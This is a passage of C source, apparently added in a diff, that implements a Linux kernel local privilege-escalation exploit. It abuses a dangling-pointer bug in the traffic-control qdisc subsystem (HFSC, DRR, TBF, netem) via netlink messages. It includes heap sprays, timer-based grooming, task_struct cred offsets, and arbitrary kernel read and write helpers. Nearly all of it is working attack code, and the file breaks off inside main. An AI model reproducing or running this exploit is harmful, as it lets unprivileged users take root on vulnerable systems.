PID_LINKS_OFF 1608 // offsetof(struct task_struct, pid_links) +#define REAL_PARENT_OFF 1512 // offsetof(struct task_struct, real_parent) +#define CRED_OFF 1984 // offsetof(struct task_struct, cred) +#define FS_OFF 2064 // offsetof(struct task_struct, fs) + +/* Offset of stab in dump message */ +#define STAB_OFF 48 + +/* Offset of fake HFSC class in disttable */ +#define HFSC_CLASS_START 4 + +/* Increases race window */ +#define CLOG_LEN 0 + +#endif + +/* Traffic control handles */ +#define VULN_NETEM_HANDLE 0xdead0000 + +/* Size of disttable */ +#define DIST_SIZE 1020 + +#define TIMER_BASE 50000 +#define TIMER_INC 100 +#define LABEL_TO_VALUE(x) (TIMER_BASE + TIMER_INC*x) + +#define DRR_SPRAY 36 +#define NETEM_SPRAY 20 + +#define err_exit(s) do { perror(s); exit(EXIT_FAILURE); } while(0) + +int clog_len; +int curr_ns; +unsigned char msgbuf[65536]; + +/* Netlink Messages */ + +/* Traffic control message header */ +struct __attribute__((packed)) tf_msg { + struct nlmsghdr nh; + struct tcmsg tm; +}; + +/* Network interface message header */ +struct __attribute__((packed)) if_msg { + struct nlmsghdr nh; + struct ifinfomsg ifi; +}; + +/* Set network interface up */ +struct if_msg if_up_msg = { + { + .nlmsg_len = 32, + .nlmsg_type = RTM_NEWLINK, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK, + }, + { + .ifi_family = AF_UNSPEC, + .ifi_type = ARPHRD_NETROM, + .ifi_flags = IFF_UP, + .ifi_change = 1, + }, + +}; + +/* Add/modify an HFSC qdisc */ +struct __attribute__((packed)) hfsc_qdisc_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + int def; +}; + +struct hfsc_qdisc_msg hfsc_qdisc_msg = { + { + .nlmsg_len = sizeof(struct hfsc_qdisc_msg), + .nlmsg_type = RTM_NEWQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "hfsc", + .options_hdr = + { + .rta_len = 8, + .rta_type = TCA_OPTIONS, + }, +}; + +/* Add/modify an RSC HFSC class */ +struct __attribute__((packed)) rsc_class_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct rtattr rsc_hdr; + struct tc_service_curve rsc; +}; + +struct rsc_class_msg rsc_class_msg = { + { + .nlmsg_len = sizeof(struct rsc_class_msg), + .nlmsg_type = RTM_NEWTCLASS, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "hfsc", + .options_hdr = { + .rta_len = 20, + .rta_type = TCA_OPTIONS, + }, + .rsc_hdr = { + .rta_len = 16, + .rta_type = TCA_HFSC_RSC, + }, + .rsc = { + .m1 = 1, + .d= 1, + }, +}; + +/* Add/modify an FSC HFSC class */ +struct __attribute__((packed)) fsc_class_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct rtattr fsc_hdr; + struct tc_service_curve fsc; +}; + +struct fsc_class_msg fsc_class_msg = { + { + .nlmsg_len = sizeof(struct fsc_class_msg), + .nlmsg_type = RTM_NEWTCLASS, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "hfsc", + .options_hdr = + { + .rta_len = 20, + .rta_type = TCA_OPTIONS, + }, + .fsc_hdr = { + .rta_len = 16, + .rta_type = TCA_HFSC_FSC, + }, + .fsc = { + .m1 = 1, + .d= 1, + }, +}; + +/* Add/modify an USC HFSC class */ +struct __attribute__((packed)) usc_class_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct rtattr fsc_hdr; + struct tc_service_curve fsc; + struct rtattr usc_hdr; + struct tc_service_curve usc; +}; + +struct usc_class_msg usc_class_msg = { + { + .nlmsg_len = sizeof(struct usc_class_msg), + .nlmsg_type = RTM_NEWTCLASS, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "hfsc", + .options_hdr = + { + .rta_len = 36, + .rta_type = TCA_OPTIONS, + }, + .fsc_hdr = { + .rta_len = 16, + .rta_type = TCA_HFSC_FSC, + }, + .fsc = { + .m2 = 1, + }, + .usc_hdr = { + .rta_len = 16, + .rta_type = TCA_HFSC_USC, + }, + .usc = { + .m2 = 1, + }, +}; + +/* Add/modify a DRR qdisc */ +struct __attribute__((packed)) drr_qdisc_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; +}; + +struct drr_qdisc_msg drr_qdisc_msg = { + { + .nlmsg_len = sizeof(struct drr_qdisc_msg), + .nlmsg_type = RTM_NEWQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "drr", +}; + +struct __attribute__((packed)) drr_class_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct rtattr quantum_hdr; + int quantum; +}; + +/* Add/modify a DRR class */ +struct drr_class_msg drr_class_msg = { + { + .nlmsg_len = sizeof(struct drr_class_msg), + .nlmsg_type = RTM_NEWTCLASS, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "drr", + .options_hdr = { + .rta_len = 12, + .rta_type = TCA_OPTIONS, + }, + .quantum_hdr = { + .rta_len = 8, + .rta_type = TCA_DRR_QUANTUM, + }, + .quantum = 65536, +}; + +/* Add/modify a TBF qdisc to let packets through */ +struct __attribute__((packed)) tbf_qdisc_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct rtattr qopt_hdr; + struct tc_tbf_qopt qopt; +}; + +struct tbf_qdisc_msg tbf_qdisc_msg = { + { + .nlmsg_len = sizeof(struct tbf_qdisc_msg), + .nlmsg_type = RTM_NEWQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "tbf", + .options_hdr = { + .rta_len = 44, + .rta_type = TCA_OPTIONS, + }, + .qopt_hdr = { + .rta_len = 40, + .rta_type = TCA_TBF_PARMS, + }, + .qopt = { + .limit = 65536, + .buffer = 65536, + .rate = { + .linklayer = TC_LINKLAYER_ETHERNET, + .rate = 1000000000, + }, + }, +}; + +/* Add/modify a TBF qdisc to wait for pkt_len-1 secs */ +struct __attribute__((packed)) stall_tbf_qdisc_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct rtattr qopt_hdr; + struct tc_tbf_qopt qopt; + struct rtattr burst_hdr; + int burst; +}; + +struct stall_tbf_qdisc_msg stall_tbf_qdisc_msg = { + { + .nlmsg_len = sizeof(struct stall_tbf_qdisc_msg), + .nlmsg_type = RTM_NEWQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "tbf", + .options_hdr = { + .rta_len = 52, + .rta_type = TCA_OPTIONS, + }, + .qopt_hdr = { + .rta_len = 40, + .rta_type = TCA_TBF_PARMS, + }, + .qopt = { + .limit = 65536, + .rate = { + .linklayer = TC_LINKLAYER_ETHERNET, + .rate = 1, + }, + }, + .burst_hdr = { + .rta_len = 8, + .rta_type = TCA_TBF_BURST, + }, + .burst = 1, +}; + + +/* Add/modify a netem qdisc to delay the packet */ +struct __attribute__((packed)) delay_netem_qdisc_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct tc_netem_qopt qopt; +}; + +struct delay_netem_qdisc_msg delay_netem_qdisc_msg = { + { + .nlmsg_len = sizeof(struct delay_netem_qdisc_msg), + .nlmsg_type = RTM_NEWQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "netem", + .options_hdr = + { + .rta_len = 28, + .rta_type = TCA_OPTIONS, + }, + .qopt = { + .limit = 65536, + .latency = -1, + } +}; + +/* Add/modify a netem qdisc with many parameters. Used for type confusion */ +struct __attribute__((packed)) parms_netem_qdisc_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct tc_netem_qopt qopt; + struct rtattr ecn_hdr; + int ecn; + struct rtattr latency_hdr; + long latency; + struct rtattr jitter_hdr; + long jitter; + struct rtattr reorder_hdr; + struct tc_netem_reorder reorder; + struct rtattr corrupt_hdr; + struct tc_netem_corrupt corrupt; + struct rtattr rate_hdr; + struct tc_netem_rate rate; + struct rtattr rate64_hdr; + long rate64; + struct rtattr slot_hdr; + struct tc_netem_slot slot; +}; + +struct parms_netem_qdisc_msg parms_netem_qdisc_msg = { + { + .nlmsg_len = sizeof(struct parms_netem_qdisc_msg), + .nlmsg_type = RTM_NEWQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "netem", + .options_hdr = { + .rta_len = 160, + .rta_type = TCA_OPTIONS, + }, + .qopt = { + .limit = 65536, + }, + .ecn_hdr = { + .rta_len = 8, + .rta_type = TCA_NETEM_ECN, + }, + .latency_hdr = { + .rta_len = 12, + .rta_type = TCA_NETEM_LATENCY64, + }, + .jitter_hdr = { + .rta_len = 12, + .rta_type = TCA_NETEM_JITTER64, + }, + .reorder_hdr = { + .rta_len = 12, + .rta_type = TCA_NETEM_REORDER, + }, + .corrupt_hdr = { + .rta_len = 12, + .rta_type = TCA_NETEM_CORRUPT, + }, + .rate64_hdr = { + .rta_len = 12, + .rta_type = TCA_NETEM_RATE64, + }, + .rate_hdr = { + .rta_len = 20, + .rta_type = TCA_NETEM_RATE, + }, + .slot_hdr = { + .rta_len = 44, + .rta_type = TCA_NETEM_SLOT, + }, +}; + +/* Add/modify a netem qdisc with a slot_dist buffer */ +struct __attribute__((packed)) dist_netem_qdisc_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct tc_netem_qopt qopt; + struct rtattr dist_hdr; + char dist[DIST_SIZE]; +}; + +struct dist_netem_qdisc_msg dist_netem_qdisc_msg = { + { + .nlmsg_len = sizeof(struct dist_netem_qdisc_msg), + .nlmsg_type = RTM_NEWQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "netem", + .options_hdr = + { + .rta_len = 32 + DIST_SIZE, + .rta_type = TCA_OPTIONS, + }, + .dist_hdr = { + .rta_len = 4 + DIST_SIZE, + .rta_type = TCA_NETEM_SLOT_DIST, + }, +}; + + +/* Add a basic filter */ +struct __attribute__((packed)) basic_filter_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct rtattr classid_hdr; + int classid; +}; + +struct basic_filter_msg basic_filter_msg = { + { + .nlmsg_len = sizeof(struct basic_filter_msg), + .nlmsg_type = RTM_NEWTFILTER, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + .tcm_handle = 1, + .tcm_info = TC_H_MAKE(1 << 16, 3 << 8), + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "basic", + .options_hdr = + { + .rta_len = 12, + .rta_type = TCA_OPTIONS, + }, + .classid_hdr = { + .rta_len = 8, + .rta_type = TCA_BASIC_CLASSID, + }, +}; + + +/* Delete all of a qdisc's filters */ +struct tf_msg del_filter_msg = { + { + .nlmsg_len = sizeof(struct tf_msg), + .nlmsg_type = RTM_DELTFILTER, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, +}; + +/* Delete a qdisc */ +struct tf_msg del_qdisc_msg = { + { + .nlmsg_len = sizeof(struct tf_msg), + .nlmsg_type = RTM_DELQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, +}; + +/* Delete a class */ +struct tf_msg del_class_msg = { + { + .nlmsg_len = sizeof(struct tf_msg), + .nlmsg_type = RTM_DELTCLASS, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, +}; + +/* Dump info for all qdiscs */ +struct tf_msg get_qdisc_msg = { + { + .nlmsg_len = sizeof(struct tf_msg), + .nlmsg_type = RTM_GETQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_DUMP, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, +}; + + +/* Syscall used to wait for RCU grace period */ +int membarrier(unsigned int flags, int cpu_id) { + return syscall(SYS_membarrier, flags, cpu_id); +} + +void pin_cpu (int cpu) { + cpu_set_t set; + CPU_ZERO(&set); + CPU_SET(cpu, &set); + if (sched_setaffinity(0, sizeof(set), &set)) + err_exit("[-] sched_setaffinity"); +} + +/* + * Send a message on the loopback device. Used to trigger qdisc enqueue and + * dequeue functions. + */ +struct sockaddr_in iaddr; +int nl_sock_fd, inet_sock_fd; +int nl_socks[4], inet_socks[4]; +void loopback_send (void) { + if (sendto(inet_sock_fd, "", 1, 0, &iaddr, sizeof(iaddr)) == -1) + err_exit("[-] sendto"); +} + +/* Helper functions for sending netlink messages */ + +void netlink_write (int sock, struct nlmsghdr *m) { + struct { + struct nlmsghdr nh; + struct nlmsgerr ne; + } ack = {}; + if (write(sock, m, m->nlmsg_len) == -1) + err_exit("[-] write"); + if (read(sock , &ack, sizeof(ack)) == -1) + err_exit("[-] read"); + if (ack.nh.nlmsg_type == NLMSG_ERROR && ack.ne.error) { + errno = -ack.ne.error; + err_exit("[-] netlink"); + } +} + +void netlink_write_noerr (int sock, struct nlmsghdr *m) { + m->nlmsg_flags &= ~NLM_F_ACK; + if (write(sock, m, m->nlmsg_len) == -1) + err_exit("[-] write"); + m->nlmsg_flags |= NLM_F_ACK; +} + +int tc_add_qd (struct tf_msg *m, int parent, int handle) { + m->tm.tcm_parent = parent; + m->tm.tcm_handle = handle; + netlink_write(nl_sock_fd, m); + return m->tm.tcm_handle; +} + +void tc_del_qd (int parent) { + struct tf_msg *m = &del_qdisc_msg; + m->tm.tcm_parent = parent; + netlink_write(nl_sock_fd, m); +} + +int tc_add_cl (struct tf_msg *m, int parent, int handle) { + m->tm.tcm_parent = parent; + m->tm.tcm_handle = parent | handle; + netlink_write(nl_sock_fd, m); + return m->tm.tcm_handle; +} + +void tc_del_cl (int handle) { + struct tf_msg *m = &del_class_msg; + m->tm.tcm_handle = handle; + netlink_write(nl_sock_fd, m); +} + +void tc_add_fl (struct basic_filter_msg *m, int clid) { + m->tm.tcm_parent = clid & 0xffff0000; + m->classid = clid; + netlink_write(nl_sock_fd, m); +} + +void tc_del_fl (int clid) { + struct tf_msg *m = &del_filter_msg; + m->tm.tcm_parent = clid & 0xffff0000; + netlink_write(nl_sock_fd, m); + +} + +void switch_ns (int ns) { + nl_sock_fd = nl_socks[ns - 1]; + inet_sock_fd = inet_socks[ns - 1]; + curr_ns = ns; +} + +/* Trigger the bug, creating a dangling pointer to parent class. + * Qdiscs must be configured so packet is enqueued at target class. */ +void trigger_vuln (int parent) { + tc_add_qd(&delay_netem_qdisc_msg, parent, VULN_NETEM_HANDLE); + loopback_send(); +} + +/* Functions for reading and writing kernel memory */ + +void write_netem_parms(int handle, int *parms, struct tc_netem_slot *slot) { + struct parms_netem_qdisc_msg *m = &parms_netem_qdisc_msg; + if (parms) { + m->latency = *(long *)&parms[0]; + m->jitter = parms[2]; + // parms[3] corresponds to unwritable memory + m->qopt.loss = parms[4]; + m->ecn = parms[5]; + m->qopt.limit = parms[6]; + // parms[7] corresponds to unwritable memory + m->qopt.gap = parms[8]; + m->qopt.duplicate = parms[9]; + m->reorder.probability = parms[10]; + m->corrupt.probability = parms[11]; + m->rate64 = *(long *)&parms[12]; + } + if (slot) + m->slot = *slot; + tc_add_qd(m, 0, handle); +} + +void read_netem_parms (int handle, char *buf) { + int nread, tread = 0; + netlink_write_noerr(nl_sock_fd, &get_qdisc_msg); + do { + if ((nread = read(nl_sock_fd, msgbuf + tread, sizeof(msgbuf))) == -1) + err_exit("[-] read"); + tread += nread; + } while (nread != 20); + tread -= 20; + + int off = -1; + for (int i = 0; i <= tread - sizeof(int); i++) { + if (*(int *)&msgbuf[i] == handle /* "netem" */ + && *(long *)&msgbuf[i + 16] == 0x6d6574656e) { + off = i; + break; + } + } + + if (off != -1) { + memcpy(buf, msgbuf + off + 56, 8); // latency + memcpy(buf + 8, msgbuf + off + 68, 8); // jitter + memcpy(buf + 16, msgbuf + off + 36, 4); // loss + memcpy(buf + 20, msgbuf + off + 140, 4); // ecn + memcpy(buf + 24, msgbuf + off + 32, 4); // limit + memset(buf + 28, 0, 4); // counter (always zero) + memcpy(buf + 32, msgbuf + off + 40, 4); // gap + memcpy(buf + 36, msgbuf + off + 44, 4); // duplicate + memcpy(buf + 40, msgbuf + off + 96, 4); // reorder + memcpy(buf + 44, msgbuf + off + 108, 4); // corrupt + memcpy(buf + 48, msgbuf + off + 120, 8); // rate + } + memset(msgbuf, 0, sizeof(msgbuf)); +} + +long *stab_addr; +int stab_handle; +int stab_ns; +long stab_needle; +long stab_parms_buf[7], stab_slot_buf[5]; + +void setup_stab_read (int handle, long parms_kaddr, long slot_kaddr, int ns) { + int flags = 0x80; + memcpy((char *)stab_parms_buf + 9, &flags, 4); + slot_kaddr += 32; + memcpy((char *)stab_parms_buf + 33, &slot_kaddr, 8); + slot_kaddr -= 32; + + parms_kaddr += 48 - IFINDEX_OFF; + memcpy((char *)stab_parms_buf + 1, &parms_kaddr, 8); + parms_kaddr -= 48 - IFINDEX_OFF; + + stab_parms_buf[6] = 0xdeadbeef; // lower bytes of needle + + stab_slot_buf[1] = 0; // flags ; limit + stab_slot_buf[2] = parms_kaddr + 232; // ops + stab_slot_buf[3] = 0xbad57ab; // stab + stab_slot_buf[4] = 0; // hash + + stab_addr = &stab_slot_buf[3]; + stab_needle = stab_slot_buf[2] << 32 | stab_parms_buf[6]; + stab_handle = handle; + stab_ns = ns; +} + +void read_netem_stab (long needle, char *buf, int n) { + int nread, tread = 0; + + int old_ns = curr_ns; + switch_ns(stab_ns); + + netlink_write_noerr(nl_sock_fd, &get_qdisc_msg); + do { + if ((nread = read(nl_sock_fd, msgbuf + tread, sizeof(msgbuf))) == -1) + err_exit("[-] read"); + tread += nread; + } while (nread != 20); + tread -= 20; + + int off = -1; + for (int i = 0; i <= - sizeof(int); i++) { + if (*(long *)&msgbuf[i] == needle) { + off = i; + break; + } + } + + n = n > 24 ? 24 : n; + if (off != -1) + memcpy(buf, msgbuf + off + STAB_OFF, n); + else + printf("[-] Failed to find stab\n"); + + memset(msgbuf, 0, sizeof(msgbuf)); + switch_ns(old_ns); +} + +long stab_read_8 (long addr) { + long val; + int old_ns = curr_ns; + switch_ns(stab_ns); + *stab_addr = addr - 32; + write_netem_parms(stab_handle, stab_parms_buf, stab_slot_buf); + tc_add_qd(&parms_netem_qdisc_msg, 0, stab_handle); + read_netem_stab(stab_needle, &val, 8); + switch_ns(old_ns); + return val; +} + +int vt_handle; +int vt_ns; +long vt_dist_p_kaddr; +long setup_vt_write (int handle, long addr, int ns) { + int old_ns = curr_ns; + vt_ns = ns; + switch_ns(vt_ns); + vt_handle = handle; + vt_dist_p_kaddr = addr + PRIVDATA_OFF + SLOT_DIST_OFF; + hfsc_qdisc_msg.def = 0; + tc_add_qd(&hfsc_qdisc_msg, 0, 0x150000); + switch_ns(old_ns); +} + +long root_addr; +void vt_write_8 (long addr, long val) { + long parms[7] = {}, *hfsc_class, dist_kaddr; + + int old_ns = curr_ns; + switch_ns(vt_ns); + + hfsc_class = &dist_netem_qdisc_msg.dist[HFSC_CLASS_START]; + ((int *)hfsc_class)[LEVEL_OFF/4] = 1; + hfsc_class[PARENT_OFF/8] = addr - CL_CVTMIN_OFF; + hfsc_class[CL_VT_OFF/8] = val; + + tc_add_qd(&dist_netem_qdisc_msg, 0, vt_handle); + + dist_kaddr = stab_read_8(vt_dist_p_kaddr); + dist_kaddr += TABLE_OFF + HFSC_CLASS_START + VT_NODE_OFF; + memcpy((char *)parms + 1, &dist_kaddr, 8); + + write_netem_parms(vt_handle, parms, NULL); + loopback_send(); + + switch_ns(old_ns); +} + +/* Functions for setting timers */ + +int add_order[] = { 0, 1, 2, 4, 9, 3, 5, 11, 10, 13, 12, 15, 6, 7, 8, 14, 16, }; +#define NUM_NODES (sizeof(add_order)/sizeof(*add_order)) +#define NUM_NEG_NODES 20 +int timer_fds[NUM_NODES]; +int neg_timerfds[NUM_NEG_NODES]; +void init_timers () { + for (int i = 0; i < NUM_NODES - 2; i++) { + timer_fds[add_order[i]] = timerfd_create(CLOCK_MONOTONIC, 0); + if (timer_fds[i] == -2) + err_exit("[-] timerfd_create"); + } + for (int i = 0; i < NUM_NEG_NODES; i++) { + neg_timerfds[i] = timerfd_create(CLOCK_MONOTONIC, 0); + if (neg_timerfds[i] == -1) + err_exit("[-] timerfd_create"); + } +} + +void add_neg_nodes (void) { + struct itimerspec t = {}; + t.it_value.tv_sec = LABEL_TO_VALUE(-1); + for (int i = 0; i < NUM_NEG_NODES; i++) { + if (timerfd_settime(neg_timerfds[i], 0, &t, NULL) == -1) + err_exit("[-] timerfd_settime"); + } +} + +void add_timer_node (long label) { + struct itimerspec t = {}; + t.it_value.tv_sec = LABEL_TO_VALUE(label); + if (timerfd_settime(timer_fds[label], 0, &t, NULL) == -1) + err_exit("[-] timerfd_settime"); +} + +void rm_timer_node (long val) { + struct itimerspec t = {}; + if (timerfd_settime(timer_fds[val], 0, &t, NULL) == -1) + err_exit("[-] timerfd_settime"); +} + +#define GR 0x61c88647u +#define QDISC_HASH(x) ((x)*GR >> 28) +long handle_to_kaddr (int handle, long netdevq_kaddr) { + long next_addr; + next_addr = stab_read_8(netdevq_kaddr + NET_DEVICE_OFF) + QDISC_HASH_TABLE_OFF; + next_addr = stab_read_8(next_addr + 8*QDISC_HASH(handle)); + while (next_addr) { + if ((int)stab_read_8(next_addr + HANDLE_OFF - QDISC_HLIST_OFF) == handle) + return next_addr - QDISC_HLIST_OFF; + next_addr = stab_read_8(next_addr); + } + return 0; +} + +int drr_spray_and_find (int parent) { + int drr_spray[DRR_SPRAY]; + + for (int i = 0; i < DRR_SPRAY; i++) + drr_spray[i] = tc_add_cl(&drr_class_msg, parent, i + 1); + + int target = 0; + for (int i = 0; i < DRR_SPRAY; i++) { + if (!target) { + tc_add_fl(&basic_filter_msg, drr_spray[i]); + loopback_send(); + if (recv(inet_sock_fd, &msgbuf, 1, MSG_DONTWAIT) != -1) { + target = drr_spray[i]; + printf("[+] Found target DRR class %x\n", target); + continue; + } + tc_del_fl(drr_spray[i]); + } + tc_del_cl(drr_spray[i]); + } + + if (!target) + printf("[-] DRR spray on %x failed\n", parent); + + return target; +} + +int add_qdisc_timer_node (int parent, int root, int *spray_handles, + int spray_hash, int label, int ns_outer, int ns_inner) { + + /* Handles of the current leaf of the three branches, and handle of tbf qdisc's parent */ + int b1, b2, b3, pin, tbfp; + + switch_ns(ns_outer); + + /* Add subtree root */ + hfsc_qdisc_msg.def = 1; + tc_add_qd(&hfsc_qdisc_msg, parent, root); + + /* Set up upper layers */ + b1 = tc_add_cl(&rsc_class_msg, root, 1); + b1 = tc_add_qd(&drr_qdisc_msg, b1, 0xffff0000); + pin = tc_add_cl(&drr_class_msg, b1, 2); + b1 = tc_add_cl(&drr_class_msg, b1, 1); + + switch_ns(ns_inner); + b2 = tc_add_qd(&drr_qdisc_msg, -1, root + 0x30000); + switch_ns(ns_outer); + + b3 = tc_add_cl(&fsc_class_msg, root, 3); + b3 = tc_add_qd(&drr_qdisc_msg, b3, root + 0x40000); + tc_add_fl(&basic_filter_msg, b3 | 1); + + /* Create dangling pointer above TBF qdisc */ + tc_add_fl(&basic_filter_msg, b1); + trigger_vuln(b1); + + tc_del_fl(b1); + tc_add_fl(&basic_filter_msg, pin); + trigger_vuln(pin); + + hfsc_qdisc_msg.def = 3; + tc_add_qd(&hfsc_qdisc_msg, parent, root); + + tc_del_cl(b1); // Create dangling pointer + switch_ns(ns_inner); + tbfp = tc_add_cl(&drr_class_msg, b2, 1); + + /* Spray to prevent a later allocation + accidentally going under the dangling pointer + in case the allocation above missed it */ + for (int i = 1; i < DRR_SPRAY; i++) + tc_add_cl(&drr_class_msg, b2, i + 1); + tc_add_fl(&basic_filter_msg, tbfp); + + /* Add TBF qdisc */ + b2 = tc_add_qd(&tbf_qdisc_msg, tbfp, root + 0x50000); + b2 = tc_add_qd(&drr_qdisc_msg, b2, 0xffff0000); + tc_add_fl(&basic_filter_msg, b2 | 1); + + /* Create dangling pointer under TBF qdisc */ + b2 = tc_add_cl(&drr_class_msg, b2, 1); + + trigger_vuln(b2); + + tc_del_fl(tbfp); + tc_del_cl(b2); // Create dangling pointer + switch_ns(ns_outer); + b3 = drr_spray_and_find(b3); + + if (!b3) { + tc_del_qd(-1); + switch_ns(ns_inner); + tc_del_qd(-1); + switch_ns(ns_outer); + return 1; + } + + + switch_ns(ns_inner); + + for (int i = 0; i < clog_len; i++) + tc_add_cl(&drr_class_msg, 0xffff0000, i + 2); + + tc_add_qd(&stall_tbf_qdisc_msg, tbfp, 0); + + switch_ns(ns_outer); + + /* Choose netem handles */ + for (int i = 0x10000000, j = 0; j < NETEM_SPRAY; i += 0x10000) { + if (QDISC_HASH(i) == spray_hash) + spray_handles[j++] = i; + } + + /* Wait for previously deleted qdiscs to be freed */ + printf("[*] Adding qdisc timer node %d\n", label); + if (membarrier(MEMBARRIER_CMD_GLOBAL, 0) == -1) + err_exit("[-] membarrier"); + + /* Destroy TBF qdisc */ + switch_ns(ns_inner); + tc_del_cl(tbfp); + switch_ns(ns_outer); + + /* Set timer on TBF qdisc */ + if (sendto(inet_sock_fd, &msgbuf, LABEL_TO_VALUE(label), 0, &iaddr, sizeof(iaddr)) == -1) + err_exit("[-] sendto"); + + /* Wait for TBF qdisc to be freed */ + if (membarrier(MEMBARRIER_CMD_GLOBAL, 0) == -1) + err_exit("[-] membarrier"); + + /* Spray netem qdiscs */ + for (int i = 0; i < NETEM_SPRAY; i++) + b3 = tc_add_qd(&parms_netem_qdisc_msg, b3, spray_handles[i]); + + return 0; +} + +int main (int argc, char **argv) { + + if (argc > 1) { + clog_len = atoi(argv[1]); + } else { + clog_len = CLOG_LEN; + } + + if (unshare(CLONE_NEWUSER) == -1) + err_exit("[-] unshare(CLONE_NEWUSER)"); + + for (int i = 0; i < 4; i++) { + if (unshare(CLONE_NEWNET) == -1) + err_exit("[-] unshare(CLONE_NEWNET)"); + + /* Open socket to send netlink commands to */ + nl_socks[i] = socket(PF_NETLINK, SOCK_RAW, NETLINK_ROUTE); + if (nl_socks[i] == -1) + err_exit("[-] nl socket"); + + /* Set lo up */ + if_up_msg.ifi.ifi_index = if_nametoindex("lo"); + netlink_write(nl_socks[i], &if_up_msg); + + /* Open inet sockets */ + iaddr.sin_family = AF_INET; + iaddr.sin_port = htons(1); + iaddr.sin_addr.s_addr = htonl(INADDR_LOOPBACK); + inet_socks[i] = socket(PF_INET, SOCK_DGRAM, 0); + if (inet_socks[i] == -1) + err_exit("[-] inet socket"); + if (bind(inet_socks[i], &iaddr, sizeof(iaddr)) == -1) + err_exit("[-] 